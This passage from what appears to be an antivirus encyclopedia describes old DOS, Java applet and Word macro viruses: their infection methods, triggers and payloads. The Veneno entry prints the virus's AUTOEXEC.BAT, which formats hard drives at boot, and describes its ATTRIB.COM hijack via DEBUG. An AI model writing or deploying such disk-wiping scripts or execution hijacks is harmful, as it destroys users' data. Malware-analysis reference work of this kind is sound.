Loads itself onto the high memory after decryption, allocating 3744 bytes (9F16:0100). 2) Moves 1561 (0619H) bytes to the high memory. Does not actually infect any files, but the file executed will not run. Damage: While the virus is memory resident, files executed will not run. Symptom: Text string: "Trojector ]I[, (c) Armagedon Utilities, Athe@" appears within the decrypted code. [Istanbul-2] Virus Type: File Virus Virus Length: Virus Reinfect Type: doesn't reinfect Place of Origin: Virus Memory Type: MCB Type PC Vectors Hooked: Int 21h Infection Procedure: 1) Gets the kernel of the host which is COMMAND.COM. 2) Finds where the carrier of the virus is. 3) Changes the attributes of the carrier. 4) Opens the file. 5) Returns 5h as the file handle. 6) Moves the file pointer, then closes the file handle. 7) Sets the file attributes of the carrier and forces a duplicate handle which is not successful. 8) Displays the strings: "This file is infected with a virus! Preinfection file size = 10,000". [Quicky] Virus Status: Origin: Eff Length: 1376 bytes Virus Type: Polymorphic Virus Symptoms : Increase of 1376 bytes in size of EXE files and decrease of 1760 bytes in the available memory. General Comments: Quicky will infect all EXE files that are executed, opened or copied. Infected files will have an increase of 1376 bytes in their sizes. It is also Memory Resident which resides in the MCB Chain. On the first infection, it will decrypt 1275 bytes of its code and then will allocate 1760 bytes. It will also hook INT 13 and 21. After doing this, it will run the host program and after executing it, it will Terminate and Stay Resident in the MCB Chain. This virus may interfere with some anti-virus programs as it also contains text string pertaining to some anti-virus overlay files. This text is found in the virus code: "Quicky" [June12] Virus Type: File Virus Other Name: Virus Length: Virus Infect Type: EXE and COM files Trigger Condition: June 12 Place of Origin: Virus Memory Type: MCB Type PC Vectors Hooked: Int 21h Infection Procedure: The virus is a TSR program. After the virus is executed it immediately loads itself into the memory, where it waits for an EXE and/or COM files to infect except COMMAND.COM. It adds approximately 2660 bytes or more. The infected file, when executed, runs normally. But a special date, June 12 of any year, displays a message and plays a tune (i.e., tune of the Philippine National Anthem). After playing the tune the system resumes normal operation. When infecting on June 12, the same message will be seen and same tune can be heard. Damage: When infecting a file and/or executing an infected file this message can be seen: "June 12 - the Independence Day of the Philippines" The Philippine flag can be seen here with the official color "MABUHAY ANG PILIPINAS" "Dedicated to Manong Eddie" At the same time the Philippine National Anthem can be heard. The tune can't be stop even pressing Ctrl+Break or Ctrl+C. Note: The virus makes a smart move by hooking Int 1 and 3 to fool the one debugging it. [Junkie.A] Virus Type: File Virus Other Name: Virus Length: Virus Infect Type: COM files (including COMMAND.COM) Trigger Condition: Place of Origin: PC Vectors Hooked: Int 21h, Int 1Ch Infection Procedure: 1) Encrypts the data from address 114C:[2CCF] to 114C:[30B6] by XORing it to D818h, forming a message: "Dr White - Sweden 1994" "VS" "Junkie Virus - Written in Malmo M01D" 2) Hooks interrupt 1Ch and 21h and infects the master boot record, reading one sector in drive C. When the infected file is executed, the virus first infects COMMAN.COM. After rebooting the system, the virus infects COM files. A virus message can be seen at the end of the file. Approximately 1030 bytes are added to infected files. Note: Diskettes accessed in an infected system will automatically get infected. [Burglar.1150] Virus Name: BURG1150 Virus Type: File Virus Virus Length: 1,150 bytes Virus Infect Type: .EXE files Trigger Condition: 14th minute Virus Re-infect: No Virus Memory Type: High Memory Resident Place of Origin: PC Vectors Hooked: INT 21h, INT 22h, INT 23h, INT 24h Infection Procedure: The virus only infects .EXE files. It adds 1,150 byte to an infected file. It encrypts the host's SS, SP, IP, and CS registers in its header and saves it somewhere in the virus program so that it will be difficult for anti-virus programs to clean them. It copies its program in the high memory at 9FAA:0000. Then it hooks to interrupt 21H by pointing it to its program in the high memory at 9FAA:0058 to be able to infect loading and executing .EXE programs. During infection it checks the current time. If it is the 14th minute of the hour, it dumps the string "Burglar/H" to the textmode screen (B800:0000) with blinking attribute. There are other text strings that can be seen inside the viral code which is "AT THE GRAVE OF GRANDMA". It also hooks to Ctrl C handler INT 23H and points it to 9FAA:016D. Upon pressing Ctrl C, it tries to infect COMMAND.COM in the current drive. It also hooks to the critical error handler INT 24 in order to hide the file infection whenever there's a virus write error to the host (if the disk is write protected). Symptom: Infected files increase by 1,159 bytes. [Xuxa.1984.C] Other Name: XUXA1984 Virus Type: File Virus Virus Length: Approximately 1984 bytes Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) Loads itself onto the high memory, allocating 4016 bytes (using MEM.EXE). 2) Infects executed *.COM and *.EXE files. It adds 1984 bytes to the host program but if the virus is memory resident, the file increase is not seen when the DIR command is used. The virus subtracts 1984 bytes to the displayed file size. The virus does not do anything special. It only replicates when a file is executed while the virus is memory resident. Any file executed afterwards will be infected. Damage: 1) Free high memory space decreases by approximately 4016 bytes. 2) Infected files increase by 1984 bytes. Symptom: Delay in program execution. [SVC-1-S] Virus Type: File Virus Virus Length: Approximately 3103 bytes Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) Loads itself onto the high memory, allocating 3120 bytes (using MEM). 2) Moves 3104 (0C20H) bytes to the high memory. 3) Infects *.COM and *.EXE files. Copies the virus code to the host program, adding approximately 3103 bytes. Loads the virus first before running the host program. While memory resident, the virus infects any executed *.COM and *.EXE files. It does not do anything special. It just replicates when it is memory resident. Only infects executed files. While the virus is resident in the memory, increase in the size of infected files will not be visible. Damage: 1) Free memory decreases by approximately 3120 bytes. 2) Increase in file size. Adds approximately 3103 bytes. Symptom: Delay in program execution due to virus activity. Text string: "(c) 1990 by SVC, Vers. 5.0" appears within the virus code. Detection method: Check for the above text string. [Avispa] Virus Name: AVISPA-D Virus Type: Polymorphic type Virus Length: 2051 bytes Virus Infect Type: .EXE files Virus Re-infect: No Virus Memory Type: Memory Resident, MCB type Place of Origin: PC Vectors Hooked: INT 21h Infection Procedure: The virus infects .EXE files. It infects the host file by attaching its program at the end of the file. It adds 2051 bytes to the infected file. Since the virus is polymorphic, its encrypted program is decrypted using XOR E491H to each byte. You can see after decrypting the data area of the virus program a string "Virus Avispa-Buenos Aires-Noviembre 1993". After decryption it allocates 2304 bytes (144 paragraphs) of memory after the resident part of COMMAND.COM to make itself resident. Then it hooks to INT 21H by changing its vector to point to its program at 17F8:030A, and infects other loading and executing .EXE programs. It attempts to open and infect files XCOPY.EXE, MEM.EXE, SETVER.EXE, and EMM386.EXE in C:\DOS\, if they exist. Symptom: Increase in .EXE file size by 2051 bytes. [Byway] Virus Name: BYWAY-A Virus Type: Polymorphic type Virus Length: 3,216 bytes Virus Infect Type: .COM, .EXE files, MBR Virus Re-infect: No Virus Memory Type: Memory resident, MCB type Place of Origin: PC Vectors Hooked: INT 21h Infection Procedure: The virus is an encrypting type and can infect both .COM and .EXE files. It corrupts the Master Boot Sector. It hooks INT 21H such that it cannot be seen in the interrupt vector table, but hooks to their routines directly. It infects the host by corrupting the file and sometimes overwriting its viral code to the host and erasing the host's program. It allocates its program in the low memory with the DOS resident programs. Once resident it infects a file when it is loaded, executed or copied. Most of the time an infected file will not display the change in its size, time and date attributes once it is infected. Once infected the files cannot be overwritten by its own or other programs, and cannot be deleted directly unless the subdirectory where it is located is deleted. Encrypted trigger dates were seen but the payload is unknown. The following are the trigger dates: JAN 4 JUL 16 FEB 6 AUG 18 MAR 8 SEP 20 APR 10 OCT 22 MAY 12 NOV 24 JUN 14 DEC 26 On these dates, the virus will not overwrite the Master Boot Sector which will render the current drive unbootable. Decrypted text string can be seen in the viral code: "<by:Wai-Chan,Aug94,UCV>" Variant: Like BYWAY-A, on the trigger dates, the virus will not overwrite the Master Boot Sector which will render the current drive unbootable. The decrypted viral code contains the following text strings: "The-HndV" "By:W.Chan-N" Damage: Corrupts the Master Boot Sector. Symptom: Infected files cannot be overwritten or deleted in the their current directories. [WORD_Kilo.B] Virus name: WORD_Kilo.B Alias: None Platform: Word 6/7 Number of macros: 3 Encrypted: Yes Size of macros: 3440 Bytes Place of origin: Malaysia Date of origin: May 15, 1997 Destructive: No Trigger date: None Password: None Seen In The Wild: No Seen where: WORD_Kilo-B is another macro virus created in Malaysia. This virus does not do anything but infect the global template and further documents. The virus has two (2) macros when infecting DOC files, and three (3) macros when infecting the global template. The macro names are: FileClose Toolsmacro FileTemplates The following information can be found in the macro code: REM a Virus from NoMercy!!! REM http://www.geocities.com/researchtriangle/3996 REM any critics, suggestions are welcome! The macro code seems like it is not encrypted. It only becomes encrypted after infection. [JAVA_NoisyBear] Virus Name: JAVA_NoisyBear Other Name(s): NoisyBear Virus Type: Java Place of origin: Unknown Date of origin: February 15, 1996 Description: This hostile Java applet displays an image of a bear with a clock superimposed on his belly. This bear makes noises and only stops when you quit the browser. [JAVA_Wasteful] Virus Name: JAVA_Wasteful Other Name(s): Wasteful Virus Type: Java Place of origin: Unknown Date of origin: February 17, 1996 Description: This hostile Java applet clogs your CPU to waste system resources. Note: You can suspend the applet's effects because it has a mouseDown() method. [JAVA_Consume] Virus Name: JAVA_Consume Other Name(s): Consume Virus Type: Java Place of origin: Unknown Date of origin: February 18, 1996 Description: This hostile Java applet clogs your CPU and eats up your system memory. [JAVA_HostileTrd] Virus Name: JAVA_HostileTrd Other Name(s): HostileThreads Virus Type: Java Place of origin: Unknown Date of origin: February 20, 1996 Description: This hostile Java applet tries to create threads, which will occupy specific resources: WasteResources[I] = new Thread(a); Such that I = 0 to 999. As such, resources are eaten up. The applet ends by prompting: "I'm a friendly applet!" [JAVA_AtkThread] Virus Name: JAVA_AtkThread Other Name(s): AttackThread Virus Type: Java Place of origin: Unknown Date of origin: February 20, 1996 Description: This hostile Java applet opens large non-functioning black windows using the command: littleWindow = new AttackFrame("ACK!"); This window gradually increases in size. This process loops indefinitely. In effect, these black windows will cover the workspace or the original window. [JAVA_TripleTrt] Virus Name: JAVA_TripleTrt Other Name(s): TripleThreat Virus Type: Java Place of origin: Unknown Date of origin: February 17, 1996 Description: This hostile Java applet opens large black windows. Commands used are similar with the Java applet AtkThread. In effect, these black windows will cover the workspace or the original window. This applet also emits a terribly annoying sound. [JAVA_Ungrateful] Virus Name: JAVA_Ungrateful Other Name(s): Ungrateful Virus Type: Java Place of origin: Unknown Date of origin: February 28, 1996 Description: This hostile Java applet displays a bogus message about your system's security. The applet requests that you log in in order to run Netscape again. Any login information you provide will be sent back to the server where the applet originated from. With this information, the applet then proceeds to attack your workstation. [JAVA_ErrMessage] Virus Name: JAVA_ErrMessage Other Name(s): ErrorMessage Virus Type: Java Place of origin: Unknown Date of origin: February 28, 1996 Description: Similar to the Ungrateful Java applet in that is displays a bogus message about your system's security. The message reads: "Netscape Security Alert: There is an attempt to violate your system's security. To restart Netscape securely, login to your local system." The applet requests that you log in in order to run the browser in "secure mode." Any login information you provide will be sent back to the server where the applet originated from. With this information, the applet then proceeds to attack your workstation. The applet uses the following codes: sendIt = new Login(myPort); sendit.communicate(user, psword); hostility codes follow [JAVA_SilentTrt] Virus Name: JAVA_SilentTrt Other Name(s): SilentThreat Virus Type: Java Place of origin: Unknown Date of origin: February 21, 1996 Description: This hostile Java applet is similar to the AtkThread Java applet in that it opens large non-functioning black windows. In effect, these black windows will cover the workspace or the original window. [JAVA_Login] Virus Name: JAVA_Login Other Name(s): Login Virus Type: Java Place of origin: Unknown Date of origin: February 28, 1996 Description: This hostile Java applet communicates information back to its home. With this information, the applet then proceeds to attack the host system. [JAVA_LoginSvrSkt] Virus Name: JAVA_LoginSvrSkt Other Name(s): LoginServerSocket Virus Type: Java Place of origin: Unknown Date of origin: February 28, 1996 Description: This hostile Java applet establishes a socket server, which will receive data from the Java applet Ungrateful. [JAVA_DoMyWork] Virus Name: JAVA_DoMyWork Other Name(s): DoMyWork Virus Type: Java Place of origin: Unknown Date of origin: March 2, 1996 Description: This hostile Java applet makes the user's workstation do some mathematical calculations. The results of these calculations are sent to the applet's home. The applet does not present any damages, except for the work put upon the user's workstation. This work can be from a business competitor or someone trying to crack codes. In the end, the applet prompts: "I'm Not Doing Anything!" [JAVA_Calculator] Virus Name: JAVA_Calculator Other Name(s): Calculator Virus Type: Java Place of origin: Unknown Date of origin: March 2, 1996 Description: This hostile Java applet just calls the applet DoMyWork. [JAVA_Report] Virus Name: JAVA_Report Other Name(s): Report Virus Type: Java Place of origin: Unknown Date of origin: March 2, 1996 Description: This hostile Java applet communicates information back to its home. It uses: public void function communicate(String testtr, String factorstr) [JAVA_RptSvrSkt] Virus Name: JAVA_RptSvrSkt Other Name(s): ReportServerSocket Virus Type: Java Place of origin: Unknown Date of origin: March 2, 1996 Description: This hostile Java applet establishes a socket server, which will receive data from the Java applet DoMyWork. [JAVA_PenPal] Virus Name: JAVA_PenPal Other Name(s): PenPal Virus Type: Java Place of origin: Unknown Date of origin: March 15, 1996 Description: This hostile Java applet forges an electronic mail from the user viewing the applet in a browser to the recipient whose address appears in the string "toMe." The return address will be listed as "penpal@" plus mailFrom which is set as "my.hostile.applet." The mail is sent using mailPort 25, which the user has no control over. A new message will be sent under the public void function run()using mailMe. This hostile Java applet is similar to the Java applet Forger. [JAVA_Forger] Virus Name: JAVA_Forger Other Name(s): Forger Virus Type: Java Place of origin: Unknown Date of origin: March 15, 1996 Description: This hostile Java applet forges an electronic mail from the user viewing the applet in a browser to the recipient whose address appears in the string "toMe." The return address will be listed as "HostileApplets@" plus mailFrom which is set as "java.sun.com." The mail is sent using mailPort 25, which the user has no control over. A new message will be sent under the public void function run()using mailMe. [JAVA_AppKiller] Virus Name: JAVA_AppKiller Other Name(s): AppletKiller Virus Type: Java Place of origin: Unknown Date of origin: April 1, 1996 Description: This hostile Java applet eliminates other loaded Java applets. This applet also has an error correction feature, which will restore its own if it was killed by its own code. [JAVA_ScapeGoat] Virus Name: JAVA_ScapeGoat Other Name(s): ScapeGoat Virus Type: Java Place of origin: Unknown Date of origin: April 17, 1996 Description: This hostile Java applet forces the browser to visit a certain web site repeatedly. This therefore will open multiple browser windows. The site is established within the code itself: Site = new URL("..."); [JAVA_DblTrouble] Virus Name: JAVA_DblTrouble Other Name(s): DoubleTrouble Virus Type: Java Place of origin: Unknown Date of origin: April 17, 1996 Description: This hostile Java applet opens huge non-functioning yellow and black windows. It is similar to the Java applet AtkThread. In effect, these yellow and black windows will cover the workspace or the original window. [PacMan] Virus Name: PacMan Virus Type: File Virus Virus Length: 89021 bytes Original Virus File: VIDACCEL.EXE Infection Procedure: This virus runs in the background infecting files that are not yet infected with this virus. The virus codes are added at the top of the file. The virus adds the following line to WIN.INI: LOAD = VIDACCEL.EXE and the following file to the C:\WINDOWS directory: VIDACCEL.EXE The above file is the virus body. Detection method: 1) After infecting a file, the virus changes the Application program icon to the PACMAC character. Infected files increase by 89021 bytes in length. 2) The virus adds the file VIDACCEL.EXE in the Windows directory. This file is the virus body. 3) The virus adds the command: "LOAD = VIDACCEL.EXE" in WIN.INI. [WORD_Safwan] Virus Name: WORD_Safwan Virus Type: Word macro virus Alias: WORD_Safw Number of macros: 2 Encrypted: No Macro names: Fileopen, System32 Size of macros: 1947 Bytes Place of origin: None Date of origin: Not sure Destructive: No Common In-The-Wild: No Description: Upon opening an infected document, Safwan will infect the global template (NORMAL.DOT). It will add 2 encrypted macros that are about 1947 bytes in total size. Further documents become infected when they are opened and will have the macro name ("System32"). On the trigger date this macro virus will display the message " Is it your birthday today ?" "Happy birthday 36". [WORD_Safw] Virus Name: WORD_Safw Virus Type: Word macro virus Alias: WORD_Safwan Number of macros: 2 Encrypted: No Macro names: Fileopen, System32 Size of macros: 1947 Bytes Place of origin: None Date of origin: Not sure Destructive: No Common In-The-Wild: No Description: Upon opening an infected document, Safw will infect the global template (NORMAL.DOT). It will add 2 encrypted macros that are about 1947 bytes in total size. Further documents become infected when they are opened and will have the macro name ("System32"). On the trigger date this macro virus will display the message " Is it your birthday today ?" "Happy birthday 36". [Eicar] Virus Name: Eicar Virus Type: File virus Virus Length: Test Virus Place of Origin: Test Virus Date of Origin: Test Virus Destructive: No Description: EICAR is a test virus developed by the European Institute of Computer Anti-Virus Research (EICAR) and anti-virus vendors for use in testing anti-virus software installations. This test file is harmless and displays the following message upon detection: "EICAR-TEST-FILE" For more information about this file, please connect to Trend's website at WWW.ANTIVIRUS.COM. [TESTVRS.COM] Virus Name: TESTVRS.COM Virus Type: File virus Virus Length: Test Virus Place of Origin: Test Virus Date of Origin: Test Virus Destructive: No Description: TESTVRS.COM is a test virus created by our research team for testing installations of Trend Micro's anti-virus products. This test file neither infects nor delivers a payload. [WORD_Dakota.A] Virus Name: WORD_Dakota.A Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 2 Encrypted: Yes Size of Macro: 1808 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: Germany Date of Origin: May, 1997 Symptoms: Displays messages Destructive: No Trigger Date: None Password: n/a Seen in the Wild: No Description: Dakota infects documents when they are closed (AutoClose). Every time a document is closed, Dakota creates a new document with the following text inside: " Dakota! ⌐ Nightmare Joker & Virtual Boy [SLAM] " This newly created document will be shown in a small window, which is moved around the screen, accompanied with a beeping sound. Dakota is a complex macro virus, which modifies itself (Dakota macro). Variants: None [WORD_Balrog.A:Sp] Virus Name: WORD_Balrog.A:Sp Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: Yes Size of Macro: 2029 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Summer, 1997 Symptoms: Displays messages, changes screen saver Destructive: Yes Trigger Date: July Password: n/a Seen in the Wild: No Description: Balrog.A infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are also closed (AutoClose). Balrog has several payloads. During July it changes the screen saver to the Marquee screen saver. This only happens on Windows 3.x machines. With a probability of 25 percent, it locates all letters "v" and replaces them with the letter "b". With a probability of 20 percent, it adds one of the following comments to the active document: " P.S.:You are a very stupid people. " " P.S.: I hate you a lot. " " P.S.: I wish your death. " " P.S.: All the things I told you are lies. " " P.S.: Call me if you need sex. " With a probability of 20 percent, it changes some settings in the ToolsOptions menu: Name is changed to "Balrog virus" Initials are changed to "BV" Address is changed to "Your machine" With a probability of 20 percent, Balrog produces a beep. With a probability of 10 percent, it opens C:\command.com and inserts its contents into the active document. Since Balrog uses language specific commands, it only works with the Spanish version of Microsoft Word. Variants: None [WORD_Dance.A] Virus Name: WORD_Dance.A Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 4 Encrypted: No Size of Macro: 1260 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: Russia Date of Origin: Summer, 1997 Symptoms: Displays messages, replaces text Destructive: Yes Trigger Date: When Day field equals Month field Password: n/a Seen in the Wild: No Description: Dance.A infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs). Dance uses ToolsMacro to make recognition of an infected document more difficult (called macro stealth technique). The following comments can be found in the code: " REM *********************************************** " " REM * Boogie v4.0beta (c) DNazi [SGWW] Kiev 1996. * " " REM * Dedicated to Mike Naumenko. * " " REM *********************************************** " Dance executes its payload when the Day field equals the Month field (January 1st, February 2nd, March 3rd, April 4th and so on). It replaces the letters "ieo" with "ooe". After that it displays the following message: " Boogie ev'ry day! " Variants: None [WORD_Dave.A] Virus Name: WORD_Dave.A Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: Yes Size of Macro: 449 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: 1997 Symptoms: Displays text on the status bar Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: Dave.A infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Dave adds the following comment to the " Virus " section inside the WIN.INI system file. Name=Dave It then displays "Dave..." on the status bar, whenever a document is opened. Variants: None [WORD_Defender.A] Virus Name: WORD_Defender.A Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 6 Encrypted: No Size of Macro: 14080 Bytes in documents Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: May, 1997 Symptoms: Displays messages Destructive: No Trigger Date: n/a Password: Name of active document Seen in the Wild: No Description: Defender infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs). Defender activates its payload when a user tries to access the ToolsMacro option. It displays the following message " Restricted Area. Please Enter your password " and then asks the user to input a password. The only possible answer is the name of the active document. Defender is an attempt at a macro Anti-Virus solution. It tries to remove several known viruses (Example: Concept) or deactivate them. The following message is displayed when a file with AutoMacros is opened: " ALERT! Autorunning macro (possibly virus) detected in document. " " Press OK to disable " Variants: None [WORD_Demon.A] Virus Name: WORD_Demon.A Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 3 Encrypted: Yes Size of Macro: 4318 Bytes in documents Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: May, 1997 Symptoms: Displays messages, modifies WIN.INI Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: Yes Description: Demon infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are closed (AutoClose). Demon is another semi-polymorphic virus, with two macros containing random names. When selecting the text " Dark Master calling " in the active document, Demon displays the following message: " WINWORD HIDDEN DEMON " " is happy to see his MASTER!!! " " GREAT DAY !!! " " This file is infected as # " Demon also adds the following section to WIN.INI: " I " In addition, the following text can be found in the code: " REM *** Infecting the system *** " " REM *** Destroing all other macro & anti-macro programms *** " Variants: None [WORD_Veneno] Virus Name: WORD_Veneno Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 12 Encrypted: Yes Size of Macro: 23544 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: Mexico Date of Origin: December, 1996 Symptoms: Destructive: Yes Trigger Date: n/a Password: Veneno Seen in the Wild: Yes Description: Veneno is a mexican virus that is able to replicate itself across the MS Word spanish version. It uses 12 macros to infect and do damage. These macros include complex routines, which execute on very special conditions. Some of them are truly dangerous putting in risk the user information. The 12 macros include: ArchivoAbrir (FileOpen) ArchivoGuardarComo (FileSaveAs) ArchivoImprimir (FilePrint) ArchivoImprimirPredeter (FilePrintPredeter) ArchivoSalir (FileExit) AutoExec AutoOpen InsertVeneno Travel1 Travel2 Triniton Veneno (When you open documents...) Veneno tries to infect the global template (NORMAL.DOT) each time you open an infected document. This infection process happens both, when you open documents from the File - Open menu and when you double-click an infected file from the MS Explorer or the File Manager. The virus checks if there are some macros installed in the NORMAL.DOT before it executes its infection routine that deletes existing macros. The number of macros the virus removes depends on the way you open an infected document. Here is a list of the macros the virus removes: FileOpen, AAAZAO, AAAZA0, PayLoad, autoOpen, autoopen, Autoopen, Autoexec, autoexec, autoExec, insertpayLoad, Insertpayload, insertPayload, payload, Payload, PAYLOAD, AUTOOPEN, ArchivoAbrir, ArchivoGuardarComo, ArchivoImprimirPredeter, ArchivoImprimir, ArchivoAbrir, ArchivoSalir, AutoExec, AutoOpen, AutoClose, AutoNew and HerramMacro. The virus modifies some MS Word values when you open an infected document from the File Manager, MS Explorer or other applications (this is when the virus executes its AutoExec macro). This macro doesn't run when you open the file from the MS Word File menu. The values the virus modifies are the user name (to "Veneno") and initials (to "PirateMX"). After being sure any other macro will interfere with its task, the virus checks if the NORMAL.DOT was infected previously. Veneno searches for its own macros AutoExec, Veneno, AutoOpen, InsertVeneo, Triniton and Travel1. If any of these macros does not exist, the virus copies its 12 macros into NORMAL.DOT. Veneno then executes two dangerous macros: Veneno and Triniton in that sequence. The Veneno macro creates a new AUTOEXEC.BAT and CONFIG.SYS when certain conditions are met. These conditions are: the Month field should be below 6, the Day field should be above 26 and a random generated number (from 1 to 30) should be 30. The new batch file will have the hard disk formatted the next time the user turns on his/her PC. The new AUTOEXEC.BAT and CONFIG.SYS files the virus creates contain the following: AUTOEXEC.BAT: @echo off PATH=C:\;C:\DOS;C:\WINDOWS;C:\ODI; Echo. Echo Insert a diskette in drive A: Echo Press any key to continue... pause > nul Format a: /autotest > nul if errorlevel 0 goto End Format d: /autotest Format c: /autotest Echo U r FuCkEd! Echo. :end Echo Ur mommy should be very happy of having such a g00d/obedient kid... jaja..asswipe!!! CONFIG.SYS: SHELL=C:\DOS\COMMAND.COM /F /P SWITCHES = /n /f (When Minutes field is 30...) The Triniton macro executes after the Veneno macro. This macro saves a COM infector (GLUPAK.847.A) and a special batch program into the hard disk of the user. The GLUPAK virus infects COM files and runs independently. Triniton leaves the GLUPAK.847.A virus in an ATTRIB.COM file in the DOS directory. The virus executes the DEBUG command with a special script file (JIJO.SCR) to create the new ATTRIB.COM file. The command the virus executes is described below: "debug < jijo.scr > nul" Once the new ATTRIB.COM is saved in the DOS directory it will be ready to start the infection process the next time the user executes this command. Take note that the original ATTRIB command is an EXE file, not a COM file. The virus takes advantage of the DOS execution priorities in order to execute the infected ATTRIB.COM file instead of the original ATTRIB.EXE. (When Minutes field is not 30...) The virus will check for other conditions in case the Minutes field is not 30. Then it will execute its dangerous routines. These conditions are: Day field is above 5 and Minutes field is below 5 or a special document variable is "Z". If these conditions are met, the virus performs the following: 1) Inserts the string "** V<N<NO ** " at the bottom of all opened documents. 2) Replaces "ste" with "stes". 3) Assigns a password ("Veneno") to all opened documents. 4) Closes all opened documents without asking the user. (When you save documents...) Veneno tries to infect other documents when you save them. Basically this occurs each time the user selects the Save As... option from the File menu in MS Word. At this moment the virus copies its 12 macros from the NORMAL.DOT to the document the user is saving. Then, once the NORMAL.DOT is infected, all the documents the user saves using the Save As... option will also be infected. Take note that the virus doesn't check if the documents are already infected. After infecting a document the virus checks for the system time. Veneno displays a message on the screen if the Seconds field is 38. This message reads: "Khelia Monica Salda~a Diaz, me encantas y te sigo buscando... Donde te has escondido? Atte. Tu enamorado. (LoVe90/91)" "Un amigo desesperado en busca de..." (When you print documents...) Veneno also appears when you print documents. To do this job the virus has two special macros called ArchivoImprimir and ArchivoImprimirPredeter. The message reads: "Finalmente me gustaria agregar que..." "El centro de Computos de esta Universidad es una verdadera verguenza, no nos merecemos este servicio" ">>> Shame on you! ! ! <<<" In english : "Finally I would like to say that..." "The computer center in this university is a real shame, we will not be deserving this service " ">>> Shame on you! ! ! <<<" The virus also deletes the last lines of the document you want to print if you click on the Print button located in the toolbar. This routine will be executed only if the Seconds field is above 57. The macros Travel1 and Travel2 are just backups to the AutoExec and AutoOpen macros, respectively. The macros ArchivoAbrir (FileOpen) and ArchivoSalir (FileExit) execute some commands to enable the automacro execution, to save changes in the NORMAL.DOT without prompting the user and to create a backup for that. [Glupak.847.A] Virus Name: Glupak.847.A Alias Name: Freaky, THU, Suicidal Dream Virus Type: File virus (COM files, non resident) Encrypted: Yes Virus Size: 847 Bytes Place of Origin: Canada Date of Origin: 1996 Destructive: Yes Trigger Date: October 21 Description: Glupak directly infects COM files appending its viral codes. The virus adds 434 months to the date of infected files and deletes the ANTI-VIR.DAT file if it exists. Glupak executes its dangerous routine on October 21. On this day the virus tries to overwrite the user's hard disk. After doing so, the virus reboots the PC and displays the following message: "Happy Birthday Freaky!" The following messages are found inside the code: [TV.Suicidal.Dream.B] (c) 1996 The Freak/The Underground From the hypnotic spectre of wake I scream locked in depths of suicidal Dream [WORD_Childish.A] Virus Name: WORD_Childish.A Alias: Chill Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 2 Encrypted: Yes Size of Macro: 361 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: 1997 Symptoms: None Destructive: No Trigger Date: None Password: n/a Seen in the Wild: No Description: Childish.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). Childish uses ToolsMacro to make recognition of an infected document more difficult (called macro stealth technique). Childish is another do-nothing macro virus. It is only infectious. Variants: None [WORD_Minimal.A] Virus Name: WORD_Minimal.A Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7, Word 8 Number of Macros: 1 Encrypted: No Size of Macro: 256 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: Yes Description: Minimal.A infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Minimal.A is also able to upconvert to the Word97 format and infect Word 8.0 documents. Variants: Minimal.B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.B] Virus Name: WORD_Minimal.B Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7, Word 8 Number of Macros: 1 Encrypted: No Size of Macro: 176 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: Yes Description: The main difference between this new variant and the original Minimal.A virus is that Minimal.B contains less macro code. Minimal.B infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Minimal.B is also able to upconvert to the Word97 format and infect Word 8.0 documents. Variants: Minimal.A,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.C] Virus Name: WORD_Minimal.C Alias: n/a Virus Type: Macro Virus Platform: Word 8 Number of Macros: 1 Encrypted: No Size of Macro: n/a Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: Yes Description: The main difference between this new variant and the original Minimal.A virus is that Minimal.C was written for the Word 97 file format (VBA 5). Minimal.C infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. 